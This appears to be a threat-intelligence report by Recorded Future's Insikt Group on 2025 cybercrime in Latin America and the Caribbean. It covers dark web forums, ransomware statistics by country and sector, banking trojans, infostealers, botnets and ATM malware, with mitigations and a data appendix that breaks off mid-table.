        <p>According to a World Economic Forum report, <a href="https://www.weforum.org/press/2026/01/cyber-enabled-fraud-is-now-one-of-the-most-pervasive-global-threats-says-new-report-45dc3f679b/">13%</a> of respondents in the LAC region expressed low confidence in their country’s preparedness to respond to significant cyber incidents. Despite significant <a href="https://publicadministration.un.org/egovkb/en-us/Reports/UN-E-Government-Survey-2024">progress</a> in digital government, regulatory advancements, and investments in the region, many countries still lack the technical competence in their workforce and the resources to sustainably harden their environments. Many LAC government networks hold large amounts of sensitive data but are <a href="https://digiamericas.org/wp-content/uploads/2024/05/LATAM-CISO-REPORT-2024_.pdf">deficient</a> in their security best practices, leaving their systems vulnerable to cyberattacks. Large breaches are routinely circulated, recycled, and resold on dark web marketplaces, enabling identity theft, synthetic identity fraud, SIM swaps, and account takeovers, among other types of cybercriminality to flourish at a larger scale.</p>
        <p>Although the LAC region has made significant technological advancements, particularly in the financial services sector, innovations are creating new challenges. The financial technology industry has introduced mobile banking applications, digital wallets, and instant payment systems. LAC countries face rising levels of cyber-enabled fraud in the financial sector because real-time payment rails have weaker identity verification controls, rendering social engineering attempts more effective. Instant payment systems, such as Brazil’s PIX and similar mobile banking platforms, have often been targeted by threat actors. With faster transaction speeds at higher volumes, detection and recovery efforts have become increasingly complex, making scams significantly more profitable and scalable.</p>
        <p>The LAC region has the world's fastest-growing <a href="https://openknowledge.worldbank.org/server/api/core/bitstreams/692c6149-748f-40dc-b9e6-8e09ba3e47bf/content">rate</a> of disclosed cyber incidents, though many remain unreported. <a href="https://digiamericas.org/wp-content/uploads/2024/05/LATAM-CISO-REPORT-2024_.pdf">Only</a> seven LAC countries have plans to protect their critical infrastructure from cyberattacks, and only twenty have Computer Security Incident Response Teams (CSIRTs). Despite <a href="https://unctad.org/page/cybercrime-legislation-worldwide">31</a> LAC countries having some form of legislation addressing cybercrime, many face skills shortages, creating barriers to enforcement. Limited law enforcement resources and unreliable interstate cooperation further delay investigation and prosecution, enabling threat actors to operate across jurisdictions with relative ease. A cultural perception that cybercrime carries low risk and offers high reward undermines the deterrent effect that reliable law enforcement action would otherwise have. This incentive structure, coupled with reduced stigma, encourages repeat offenses and recruitment, as reflected in the cybercriminal trends observed by Insikt Group in 2025.</p>
        <h2>Cybercriminal Activities in LAC</h2>
        <p>Throughout 2025, Insikt Group investigated and identified different types of cybercriminals operating on clearnet and dark web sources. Cybercriminals routinely leveraged phishing for initial access, and among the most common methods seen was the search and collection of sensitive information directly from a compromised host's file system or databases. This technique is often a critical pre-exfiltration step used to obtain financial records, passwords, and other forms of personally identifiable information (PII), likely to conduct account takeovers or fraud. Insikt Group research found that cybercriminals have also begun evolving their TTPs to exploit near-field communications (NFC) to commit financial fraud and are using malware to target cryptocurrency wallets. Insikt Group intelligence indicates that cybercriminals are primarily interested in selling compromised databases and access methods, as well as participating in hacktivist collectives. In some instances, advanced persistent threats (APTs) have also begun to overlap their activities with cybercrime when targeting the region.</p>
        <h2>Cybercriminal Sources</h2>
        <p>Threat actors operating in or targeting the LAC region continued to rely on the infrastructure of established English- and Russian-speaking forums throughout 2025 (see <strong>Appendix A</strong>). Insikt Group identified Spanish- and Portuguese-language postings on several established dark web and special-access forums. Even though these sources are predominantly English- and Russian-speaking, these posts likely indicate a preference among threat actors targeting LAC to seek more established, traditional platforms for conducting business. Research showed that low to moderate-tier forums are most commonly used by threat actors based in or targeting LAC countries, possibly suggesting lower levels of sophistication, as higher-tier forums often require vouching, payment, demonstration of knowledge or technical abilities, and sometimes private invitation to gain access.</p>
        <p>Insikt Group assesses that most communications between threat actors likely occur on encrypted messaging platforms such as Telegram, WhatsApp, and Signal due to speed, ease of access, and higher levels of trust among group members. Given the privacy-enhancing features of many of these platforms, collection efforts can become significantly more constrained. Telegram is predominantly used because it offers larger channel and group capacities, account creation is simple, it enables threat actors to leverage bot automation and support for their malicious activities, and content moderation is typically less stringent than on other platforms. By offering a path of least resistance, threat actors enjoy the added privacy that end-to-end encrypted messaging platforms provide without delaying their operations.</p>
        <p>Financially motivated threat actors often advertise a variety of data types, including PII, financial data, login credentials, system access credentials, exploits and vulnerabilities, malware, ransomware, and hacking tutorials. In some instances, Insikt Group observed threat actors selling customer relationship management (CRM) access, virtual private network (VPN) access with domain user privileges and local administrator rights on a database server, and command-and-control (C2) access to LAC-based entities in 2025. Leveraging this access to information, cybercriminals may facilitate further crimes, including but not limited to extortion attempts, digital and social engineering scams, ransomware deployment, data theft, and account takeovers. Insikt Group research indicates that threat actors generally advertise breached databases and payment card data because they can be lucrative, require relatively low levels of sophistication, and are sought after by other cybercriminals.</p>
        <p>Threat actors often target government systems because they contain highly sensitive data that can be profitable for scams, identity theft, or extortion. For instance, shortly after a tense general election, Ecuador’s legislature, the National Assembly, <a href="https://therecord.media/ecuador-national-assembly-cyberattack">reported</a> it had suffered two cyberattacks aimed at accessing confidential data and disrupting the availability of information services. In another example, threat actors exposed sensitive data on millions of Paraguayan citizens on the dark web; among the alleged exfiltrated data are national ID numbers, dates of birth, physical addresses, and health service records.</p>
        <p>DarkForums was the primary dark web and special-access forum where Insikt Group recorded the most posts relating to cybercrime-related events in Spanish and Portuguese in 2025. This forum is an English-language, low-tier forum operated by English-speaking administrators, launched in March 2023, and is accessible via a clearnet domain. Additionally, DarkForums was observed hosting leaked databases and data breaches involving Spanish-speaking countries, with posts describing the compromise of thousands of records and credentials. Other forums, such as XSS, Exploit, RehubcomPro, Cracked, BreachForums 2, ProCrd, and CrdPro, were also among the top forums to contain posts in Spanish and Portuguese. <strong>Appendix A</strong> presents a sample of Spanish and Portuguese forum threads from these sources.</p>
        <h2>Cybercriminal Tactics and Attack Vectors</h2>
        <p>The LAC region has a long history of financially motivated cybercrime; as a result, Insikt Group observed in this analysis that threat actors continue to heavily target the financial sector. Threat actors typically rely on traditional initial access methods, such as phishing via email, SMS, and WhatsApp messages, impersonating financial institutions, and requesting invoices or payments. Threat actors deliver lures via malicious links that redirect to fake login pages and contain malicious attachments with embedded links. Many of these techniques are effective when targeting entities in the LAC region due to an overwhelming reliance on email and messaging applications for business, as well as a general strong trust in branded communications. Artificial intelligence (AI) has introduced more sophisticated methods into the cybercriminal ecosystem in LAC, lowering the barrier to entry for threat actors and significantly increasing the scalability of attacks through automation. AI helps threat actors create more effective phishing messages that could be generated in native Spanish or Portuguese, rendering them more convincing to the local target audience. The advent of <a href="https://publications.iadb.org/en/publications/english/viewer/2025-Cybersecurity-Report-Vulnerability-and-Maturity-Challenges-to-Bridging-the-Gaps-in-Latin-America-and-the-Caribbean.pdf">agentic AI</a> also presents new opportunities and attack vectors for cybercriminal groups to exploit and greatly facilitates cybercrime-as-a-service. Organized criminal groups have <a href="https://www.fiap.gob.es/wp-content/uploads/2024/11/ELPACCTO2-IAyCrimen-EN.pdf">integrated</a> AI into their operations to assist with drug smuggling, money laundering, cyber-enabled fraud, and malware development.</p>
        <p>Throughout 2025, Insikt Group observed threat actors targeting the LAC region by compromising remote desktop protocol (RDP), VPNs, and web admin panels, and obtaining credentials from prior infostealer infections, password reuse, brute-force attacks, and other initial access points. Based on data within the Recorded Future Intelligence Operations Platform, there are approximately 29,000 references to exposed LAC-related credentials on Russian Market. These exposed credentials are from domains belonging to the top organizations (by revenue) in the healthcare, government, and financial sectors across the five largest economies in LAC. Russian Market is one of the leading dark web marketplaces for the sale and distribution of infostealer logs. Most of these logs were from LummaC2 and then Acreed Stealer, consistent with what Insikt Group observed in its review of additional infostealer logs. It should be noted that many of the 29,000 exposed credentials are likely customers of these organizations and not necessarily employees, as Recorded Future does not have access to internal-facing employee domain addresses to search for exposed credentials; however, those can be added by an end user. Insikt Group assesses that these attack vectors were likely effective for infiltrating the systems of targets in the LAC region due to increased remote work adoption, legacy infrastructure in many public institutions, and limited monitoring and resources. Insikt Group observed threat actors advertising carding tools, bulk SMS/Email blasting, SIM swapping, hacking assistance, and other similar services on Telegram channels.</p>
        <p>In 2025, Insikt Group observed a rise in novel types of malware that actively leverage and exploit NFC. First <a href="https://www.threatfabric.com/blogs/phantomcard-new-nfc-driven-android-malware-emerging-in-brazil">identified</a> by Threat Fabric, PhantomCard is an Android trojan, notably a variant of China-origin NFC relay malware-as-a-service (MaaS), primarily <a href="https://www.threatfabric.com/blogs/phantomcard-new-nfc-driven-android-malware-emerging-in-brazil">targeting</a> banking customers in Brazil. PhantomCard enables relay attacks by obtaining NFC data from a victim's banking card and transmitting it to a threat actor's device to perform transactions at point-of-sale (POS) systems or ATMs. PhantomCard is distributed via malicious webpages that impersonate legitimate applications, prompting victims to tap their cards and enter their personal identification numbers (PINs) for authentication. Once credentials are fraudulently obtained, they are relayed to attackers.<br />Similarly, in late 2025, threat actors deployed RelayNFC, a mobile malware that targets contactless payment cards, in a phishing campaign targeting Brazilian users. This evolution in TTPs parallels the shift by threat actors from skimming magnetic stripe data to “shimming” Europay, Mastercard, and Visa (EMV) chip data in the payment fraud ecosystem, since unique cybercriminal solutions typically follow new security innovations.</p>
        <p>Per the 2025 Cybercriminal Cryptocurrency Annual Activity Report, Insikt Group consistently observed activity in which cryptocurrency wallets were targeted by various forms of malware, such as drainers, clippers, and miners, to steal funds. Given the persistent lag in cybersecurity measures in LAC and the rapid growth of the cryptocurrency market in the LAC region, its users may become attractive targets for cybercriminals. The top <a href="https://www.chainalysis.com/blog/latin-america-crypto-adoption-2025/">five</a> countries in the LAC region that dominate the cryptocurrency ecosystem are Brazil, Argentina, Mexico, Venezuela, and Colombia. However, Brazil is the clear <a href="https://www.chainalysis.com/blog/latin-america-crypto-adoption-2025/">leader</a>, accounting for a third of overall cryptocurrency activity. Insikt Group assesses that, as the mainstream adoption of cryptocurrency continues, threat actors will likely seek targets in these countries, as knowledge and security practices among the user base in these regions will likely be lacking. Additionally, as with threat actors in other regions of the world, those targeting LAC will almost certainly leverage this medium of exchange to transact and launder illicit funds. As countries continue to adopt new regulations and introduce new forms of cryptocurrency, we expect threat actors to identify new vectors for exploitation. As of 2025, Argentina, Brazil, Colombia, Ecuador, Paraguay, Trinidad and Tobago, Uruguay, and Venezuela are participating in INTERPOL’s inaugural pilot phase for the new <a href="https://www.interpol.int/News-and-Events/News/2025/INTERPOL-publishes-first-Silver-Notice-targeting-criminal-assets">Silver Notice</a>, which will be published to “help trace and recover criminal assets, combat transnational organized crime and enhance international police cooperation,” likely including cryptocurrency assets if linked to criminal proceeds.</p>
        <h2>Advanced Persistent Threats (APTs) and Cybercrime</h2>
        <p>Throughout 2025, Insikt Group observed a rise in APT activity targeting the LAC region using traditional cybercriminal methods, such as phishing and ransomware. This suggests some APT groups may also have financial motivations extending beyond seeking strategic geopolitical influence. Prominent APTs, such as Dark Caracal, conducted cyber espionage and delivered the Poco RAT via financial-themed phishing. TAG-144 (Blind Eagle) primarily targeted government entities in South American countries, notably Colombia, using TTPs such as spearphishing and remote access trojans (RATs) in campaigns blending espionage and financial motives.</p>
        <p>Insikt Group assesses that some Chinese state-sponsored activity is likely aimed at <a href="https://www.atlanticcouncil.org/commentary/the-5x5-the-state-of-cybersecurity-in-latin-america/">protecting</a> economic investments in the region, such as the Belt and Road Initiative (BRI), sovereign loans, and widespread commercial interests. In addition to the above APT groups, Chinese state-sponsored groups are also targeting entities in LAC countries. TAG-141 (FamousSparrow) leveraged SparrowDoor malware against entities in Mexico, Argentina, and Chile. Storm-2603 (Gold Salem) deployed ransomware, including Warlock, LockBit, and Babuk, targeting multiple sectors across agriculture, government, energy and natural resources, and telecommunications in the LAC and Asia-Pacific (APAC) regions. This activity may signal that China is seeking to retain influence in the LAC region through cybercriminal means or is interested in financial gain.</p>
        <h2>Hacktivism</h2>
        <p>The LAC region has repeatedly experienced periods of complex political and social unrest fueled by debates regarding economic reforms, corruption, and inequality. Unlike financially motivated cybercrime, hacktivism tends to be political or ideological, and these tense conditions can create an environment where hacktivism spikes. In late 2025, Insikt Group noticed increased activity from Chronus Team, a hacktivist group known for defacement attacks and data leaks aimed at exposing security vulnerabilities, primarily targeting organizations in Mexico. The threat group leverages Telegram channels for communication and propaganda. It has loosely aligned with other hacktivist and cybercriminals groups, such as Elite 6-27 and Sociedad Privada 157, to gain attention and increase its reputation. Insikt Group observed another trend where several hacktivist groups began transitioning to ransomware-as-a-service (RaaS) for financial gain. One such hacktivist group, “FiveFamilies”, functions as a collective of several groups; some of their targeted entities included those located in Cuba and Brazil.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1adeca9f01a5609ed0ab681070409af59d1685f44.png?width=750&amp;format=png&amp;optimize=medium" width="868" height="546" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1</strong>: Chronus Team hack and web defacement of the website for the budget transparency for the municipality of Hermosillo, Sonora, Mexico (Source: Social Media)</em></div>
          </div>
        </div>
        <h2>Malware Trends</h2>
        <p>In 2025, Insikt Group observed elevated ransomware activity targeting organizations in the LAC region. Additionally, banking trojans also remained a prominent issue affecting LAC countries, with Insikt Group noting an uptick in campaigns specifically leveraging WhatsApp for delivery. Infostealers remained a popular initial access enabler in the LAC region. Botnets have grown in the region largely due to small office/home office (SOHO) devices, such as routers and other internet-of-things (IoT) appliances with weak security, outdated firmware, and a reliance on default credentials. Botnet activity can contribute to credential theft, the propagation of phishing campaigns, the distribution of spam, the takeover and abuse of residential IP addresses, and the enabling of distributed denial-of-service (DDoS) attacks. Insikt Group also observed threat actors targeting payment terminals in 2025 with ATM and POS malware.</p>
        <h2>Ransomware</h2>
        <p>In 2025, Recorded Future’s Global Ransomware Landscape Dashboard recorded 452 ransomware incidents impacting the LAC region out of 7,346 total globally, based on all publicly known ransomware victims listed on associated ransomware blogs. Attacks on entities in the LAC region constituted just over 6% of all global ransomware attacks in 2025. The top five industries most impacted by ransomware in the LAC region in 2025 were Healthcare (36 attacks), Manufacturing (49 attacks), Government (28 attacks), Information Technology (21 attacks), and Education (20 attacks), as demonstrated in <strong>Figure 3</strong>. Insikt Group research on ransomware in the LAC region covers 27 of the 33 constituent countries. Insikt Group did not obtain ransomware data from Antigua and Barbuda, Belize, Cuba, Saint Kitts and Nevis, Saint Lucia, or Suriname in 2025.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13c187088bebe57a3ba341e5db6d3955c5db15fcd.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="545" />
            </div>
          </div>
          <div>
            <div><strong>Figure 2:</strong> Global Ransomware Landscape Dashboard view of attack metrics for the top five ransomware groups impacting LAC in 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1fa7b50698ac634f7f8edf4b0d090a89ad875dda1.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="840" />
            </div>
          </div>
          <div>
            <div><strong>Figure 3:</strong> Global Ransomware Landscape Dashboard view of attack metrics for the top five most impacted industries in LAC in 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>Insikt Group observed an increase in ransomware activity across all major industries in LAC compared to the prior year. Insikt Group specifically examined ransomware attacks against financial, government, and healthcare entities across the LAC region and identified the following: 16 attacks targeting the finance sector, 28 attacks targeting the government sector, and 36 attacks targeting the healthcare sector. <strong>Appendix C</strong> highlights a sample of these ransomware attacks.</p>
        <p>Regarding LAC countries, the top five countries most impacted by ransomware in the LAC region in 2025 were Brazil (128 attacks), Mexico (78 attacks), Argentina (63 attacks), Colombia (51 attacks), and Peru (27 attacks). These countries are among the largest economies in the region, which may lead to downstream spillover effects for enterprises that conduct business directly with them or with neighboring countries. Insikt Group found that the majority of ransomware groups leverage double extortion. This extortion technique involves encrypting a victim’s data, exfiltrating the data, and then threatening to publicly leak the data on the ransomware group’s name-and-shame blog if a ransom is not paid. Recorded Future assesses countries by network intrusion and ransomware targeting risk every quarter to provide awareness and help organizations assess risk exposure. Takeaways from the top five impacted countries based on metrics and analysis from Recorded Future include:</p>
        <ul>
          <li>Brazil’s network intrusion risk score increased from Medium to Very High, and Brazil’s ransomware targeting risk score remained Medium by the end of 2025. Brazil was the most targeted country in LAC and among the top ten countries worldwide impacted by ransomware in 2025, with a total of 130 victims.</li>
          <li>Mexico’s network intrusion risk score increased from Very Low to Low, and Mexico’s ransomware targeting risk score increased from Low to Medium at the end of 2025. Notably, data was leaked relating to a Mexican government entity on the dark web name-and-shame extortion website, Tekir Apt Data Leak Site.</li>
          <li>Argentina’s network intrusion risk score increased from Very Low to Low, and Argentina’s ransomware targeting risk score increased from Low to Medium at the end of 2025. Insikt Group observed that Argentina was targeted by a new rust-based ransomware “RALord”.</li>
          <li>Colombia’s network intrusion risk score increased from Low to High, and Colombia’s ransomware targeting risk score remained low with no observed changes at the end of 2025. Colombia’s financial sector was impacted by the ransomware group Crypto24, which posted victims' names on its blog.</li>
          <li>Peru’s network intrusion risk score increased from Very Low to Low, and Peru’s ransomware targeting risk score was low with no observed changes at the end of 2025. A pharmaceutical company headquartered in Peru was named as a victim on the Dire Wolf Blog.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dac72236ed639639adfd668cafbc142247671aae.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="825" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Global Ransomware Landscape Dashboard view of the most affected countries in LAC in 2025 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Banking Trojans</h2>
        <p>According to the Global System for Mobile Communications Association (GSMA), in 2024, approximately 64% of the LAC population used mobile internet; it is <a href="https://www.gsma.com/solutions-and-impact/connectivity-for-good/mobile-economy/wp-content/uploads/2025/05/GSMA_Latam_ME2025_R_Web.pdf">projected</a> that this will increase to nearly three-quarters by 2030. <a href="https://publications.iadb.org/en/publications/english/viewer/2025-Cybersecurity-Report-Vulnerability-and-Maturity-Challenges-to-Bridging-the-Gaps-in-Latin-America-and-the-Caribbean.pdf">Increasing</a> internet penetration and high cell phone subscription rates in LAC signify a rising reliance on mobile devices, likely making them more appealing targets for threat actors. <a href="https://gs.statcounter.com/os-market-share/mobile/south-america/2025">Android</a> remains the predominant operating system (OS) of mobile devices in South America with an 84.59% market share. Android devices may support more sideloaded applications (links and Android application packages [APKs] from social media or third-party stores) than Apple iOS, which typically has tighter ecosystem controls, and Android users may be running older OS versions, thereby making Android devices attractive targets for cybercriminals. The Android ecosystem grants developers more freedom to list apps within the Google Play Store, and the vetting and verification process is less stringent, allowing malicious APK domain mirrors to go undetected. In LAC, users may rely on mobile phones as their <a href="https://www.undp.org/sites/g/files/zskgke326/files/2022-09/undp-rblac-Digital-EN.pdf">primary</a> or only computing device, making them desirable initial access points for threat actors to deploy Android-based malware. According to the <a href="https://www.worldbank.org/en/publication/globalfindex">World Bank's</a> Global Findex 2025 report, 37% of adults in the LAC region had a mobile money account as of 2024. Mobile banking, digital wallets, and QR payments are commonplace in the area. Based on the World Bank’s findings, Insikt Group assesses that persistent mobile banking malware targeting LAC is likely driven by rapid digital banking integration that has outpaced security controls and the expansion of MaaS ecosystems. Sophisticated localized social engineering attacks and disproportionate regional enforcement capacity are further accelerating this trend within LAC’s ever-evolving mobile financial landscape.</p>
        <p>Insikt Group research reflected an increase in banking trojans targeting the WhatsApp platform in 2025. Brazilian authorities have, in recent years, focused their attention on <a href="https://therecord.media/brazil-police-arrests-grandoreiro-banking-trojan-suspects">disrupting</a> banking trojans. A significant amount of crimeware in LAC consists of mobile banking trojans, though similar in many ways, they are not a monolith and differ in unique ways. Insikt Group analysis from 2025 reflects that, despite some law enforcement disruptions, banking trojans are still a prominent issue in the LAC region and will likely continue to be in 2026. <strong>Appendix D</strong> highlights the most active banking trojans across the LAC region in 2025.</p>
        <h2>Infostealers</h2>
        <p>Infostealers pose a persistent threat worldwide, and the LAC region is no exception. Insikt Group analyzed a small sample of the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors across the top five largest economies in LAC. Analysis showed that the most prominent infostealer threats observed in 2025 were LummaC2, Vidar, Rhadamanthys, RedLine, and Nexus. This is despite multiple law enforcement operations under Operation Endgame conducting takedowns impacting <a href="https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down">Rhadamanthys</a> and <a href="https://www.justice.gov/opa/pr/justice-department-seizes-domains-behind-major-information-stealing-malware-operation">LummaC2</a>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10acef9d339a54f3193b63b20cdcf8ebd3a52f4a8.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="636" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Infostealers infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)</em></div>
          </div>
        </div>
        <p>LummaC2 was undoubtedly the most active infostealer targeting entities in the LAC region despite being targeted by law enforcement. LummaC2 has been discussed in several news sources and Telegram chatter as targeting users in Argentina, Paraguay, and Mexico. Cybercriminals deploy LummaC2 to obtain victim credentials to carry out financial fraud and cryptocurrency theft. Insikt Group conducted research into LummaC2 affiliates and identified a likely Mexico-based threat actor operating under multiple aliases linked to Lumma build ID “re0gvc”. In mid-2025, law enforcement took measures to disrupt LummaC2; the operation effectively led to the takedown of approximately 2,300 malicious domains integral to LummaC2’s infrastructure, Lumma’s central command, and associated criminal marketplaces. Shortly after this operation, it appears LummaC2 still had infected victims in several countries, including Brazil and Colombia, likely because <a href="https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/">sinkholing</a> requires some time to have a noticeable effect as it redirects traffic but does not automatically clean infected machines. More complete remediation would require patching and malware removal on affected systems, which is challenging to implement at scale when infected devices are spread across the world. However, Insikt Group observed a significant decrease in credentials exposed by LummaC2 in the second half of 2025, likely due to the success of the joint Microsoft and law enforcement operation, as well as the main threat actor being banned from Exploit.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15861d6f118617071c82f361bbec193b87feccd4d.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="397" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>LummaC2 infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)</em></div>
          </div>
        </div>
        <p>In the wake of the LummaC2 operation, Recorded Future detected an increase in Vidar infections during the latter half of 2025. This increase highlights threat actors’ ability to migrate between infostealers to facilitate their criminality despite disruptions.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1039a8a696c49e31ab94796a1a8b0e40112173726.png?width=750&amp;format=png&amp;optimize=medium" width="1512" height="397" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Vidar</em> <em>Infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)</em></div>
          </div>
        </div>
        <h2>Botnets</h2>
        <p>Botnet activity has grown steadily in the LAC region, enabling financial fraud, spam distribution, credential harvesting, initial access for ransomware and large-scale DDoS attacks targeting financial and government institutions. Botnets remained a priority for international law enforcement in 2025. For example, the ongoing <a href="https://www.europol.europa.eu/operations-services-and-innovation/operations/operation-endgame">Operation Endgame</a> aims to hinder threat actors' remote-control capabilities by dismantling ransomware and other malware infrastructure. Emerging in late 2025, Kimwolf, also known as AISURU, is a botnet that targets compromised streaming devices. News reporting and dark web chatter indicate many of the devices infected with Kimwolf are based in Brazil, India, the US, and Argentina. Additional <a href="https://krebsonsecurity.com/2026/01/who-benefited-from-the-aisuru-and-kimwolf-botnets/">reporting</a> suggests a threat actor involved with the AISURU botnet is likely based in Brazil. Horabot is a malware family and type of botnet first identified in June 2023, targeting Spanish-speaking users in six LAC countries: Mexico, Guatemala, Colombia, Peru, Chile, and Argentina. Horabot uses invoice-themed phishing emails to gain initial access to victims' systems.</p>
        <h2>Payment Terminal Malware</h2>
        <p>Threat actors also continued to target payment infrastructure for financial gain. ATM malware activity has continued to <a href="https://www.mcsystems.com/insight/atm-malware-attacks-on-the-rise-in-the-region-warns-fintech-expert/">rise</a> in LAC, with some experts noting ATM malware attacks have spiked by 46% across LAC in 2025. For instance, Ploutus is a sophisticated malware family first detected in Mexico in 2013, which compromises ATMs by issuing unauthorized commands to their cash dispensing modules. In <a href="https://therecord.media/doj-charges-gang-malware-ploutus">December</a> 2025, the US Department of Justice indicted 54 individuals associated with the Venezuelan gang Tren de Aragua (TDA) for participation in a massive ATM jackpotting scheme that exploited Ploutus malware. Moreover, the POS malware MajikPOS, designed to infiltrate systems connected to POS terminals and extract magnetic stripe payment data from bank cards, remained an active threat to companies operating in Brazil.</p>
        <h2>Mitigations</h2>
        <ul>
          <li><strong>Use Recorded Future’s Global Ransomware Landscape Dashboard</strong>: Recorded Future customers can proactively mitigate this threat by operationalizing the Recorded Future Global Ransomware Landscape Dashboard and leveraging the victimology tab to filter based on ransomware group, country, and industry of interest. Recorded Future customers can customize their own ransomware risk profile and establish alerts that align with their risk priorities.</li>
          <li><strong>Use Recorded Future’s Threat and Third-Party Risk Monitoring</strong>: Configure alerts in the Recorded Future Intelligence Cloud to track activity across Telegram channels, darkweb forums, and other platforms for proactive awareness. Use the Third-Party Intelligence module to assess risk exposure for current and future partnerships.</li>
          <li><strong>Update Legacy Systems</strong>: Threat actors, whether opportunistic or financially motivated, or both, often seek to exploit vulnerable systems. Organizations that rely on outdated technology stacks leave themselves exposed to preventable cyber threats and attacks.</li>
          <li><strong>Engage in Public-Private Information Sharing</strong>: To bolster regional collaboration and establish standardized best practices, coordinate with law enforcement, and create intelligence-sharing channels to enhance investigations and decrease incident response times.</li>
          <li><strong>Generate Awareness through Education</strong>: Advocating for digital literacy through university partnerships and scholarship in the LAC region will encourage good cyber hygiene and prepare for a stronger, more competent workforce. Enterprises can implement mandatory cybersecurity training during new hire onboarding and establish routine drills to ensure protocols are followed.</li>
        </ul>
        <h2>Outlook</h2>
        <p>Insikt Group has highlighted the most salient cybercriminal trends and methods observed throughout the LAC region in 2025. Threat actors conducted phishing and credential theft to gain and sell initial access to LAC organizations while often relying on dark web forums and end-to-end encrypted messaging platforms to communicate and monetize compromised data and access methods. Cybercriminals carried out elevated ransomware attacks against the healthcare, government, finance, and other critical sectors. Banking trojan and infostealer activity persisted throughout LAC despite law enforcement disruption attempts. Cybercriminals have proven to be adaptive and resilient, often capitalizing on immature or emerging businesses that lack the skills, tools, and personnel to prevent attacks. Small and medium-sized enterprises (SMEs) constitute over <a href="https://www.eucybernet.eu/wp-content/uploads/2025/09/guide-for-smes-lac4-2025-september-2025.pdf">95%</a> of all businesses in LAC. SMEs are desirable targets for cybercriminals because they typically have limited resources and expertise, lack robust infrastructure, and have a high overreliance on third-party platforms. Insikt Group trend analysis supports these findings.</p>
        <p>Absent regional harmonization of cybersecurity policies and best practices, LAC countries will likely continue to use fragmented incident response approaches, complicating cross-border cooperation and collaboration. For effective and sustainable protection of systems and information against cyber threats, LAC countries should focus on working together to establish standardized risk assessments and reporting mechanisms, protocols for information sharing to bolster timely remediation, and implement proactive “secure by design” principles. Possible <a href="https://digiamericas.org/wp-content/uploads/2024/05/LATAM-CISO-REPORT-2024_.pdf">approaches</a> to accomplishing this may include increased investment in workforce development, participation in public-private partnerships, and the establishment of centralized cybersecurity management systems. Despite the lack of prominent Spanish- and Portuguese-language forums, it is likely that threat actors will continue to leverage traditional platforms and methods similar to those used by the English- and Russian-speaking cybercriminal underground. Based on current and historical data, we anticipate these trends will continue, and LAC will likely remain a popular target for ransomware groups and a hotspot for mobile malware in 2026.</p>
        <h2>Appendix A: Sample Listing of Posts Targeting Entities in LAC Countries on Dark Web and Special Access Forums</h2>
        <div>
          <div>
            <div><strong>Alleged Access or Leak</strong></div>
            <div><strong>Source</strong></div>
            <div><strong>LAC Country and Sector Impacted</strong></div>
          </div>
          <div>
            <div>Access to a Brazilian banking entity</div>
            <div>XSS Forum</div>
            <div>Brazil/Finance</div>
          </div>
          <div>
            <div>VPN access to a Colombian bank</div>
            <div>Exploit Forum</div>
            <div>Colombia/Finance</div>
          </div>
          <div>
            <div>Access to a leaked government database</div>
            <div>DarkForums</div>
            <div>Mexico/Government</div>
          </div>
          <div>
            <div>Database access to the official government portal</div>
            <div>Exploit Forum</div>
            <div>Argentina/Government</div>
          </div>
          <div>
            <div>Web shell access with root privileges for a healthcare provider</div>
            <div>XSS Forum</div>
            <div>Chile/Healthcare</div>
          </div>
          <div>
            <div>Global VPN access to a healthcare network</div>
            <div>RehubcomPro Forum</div>
            <div>Brazil/Healthcare</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix B: Sample Metrics of the Top Five Ransomware Groups Impacting LAC in 2025</h2>
        <div>
          <div>
            <div><strong>Group Name</strong></div>
            <div><strong>Total Attacks (All Sectors)</strong></div>
            <div><strong>Healthcare</strong></div>
            <div><strong>Manufacturing</strong></div>
            <div><strong>Government</strong></div>
            <div><strong>IT</strong></div>
            <div><strong>Education</strong></div>
          </div>
          <div>
            <div>Qilin (Agenda)</div>
            <div>54</div>
            <div>4</div>
            <div>6</div>
            <div>0</div>
            <div>2</div>
            <div>2</div>
          </div>
          <div>
            <div>LockBit Gang (BITWISE SPIDER, DEV-0396, Flighty Scorpius)</div>
            <div>29</div>
            <div>2</div>
            <div>3</div>
            <div>1</div>
            <div>1</div>
            <div>4</div>
          </div>
          <div>
            <div>Safepay</div>
            <div>27</div>
            <div>2</div>
            <div>4</div>
            <div>0</div>
            <div>0</div>
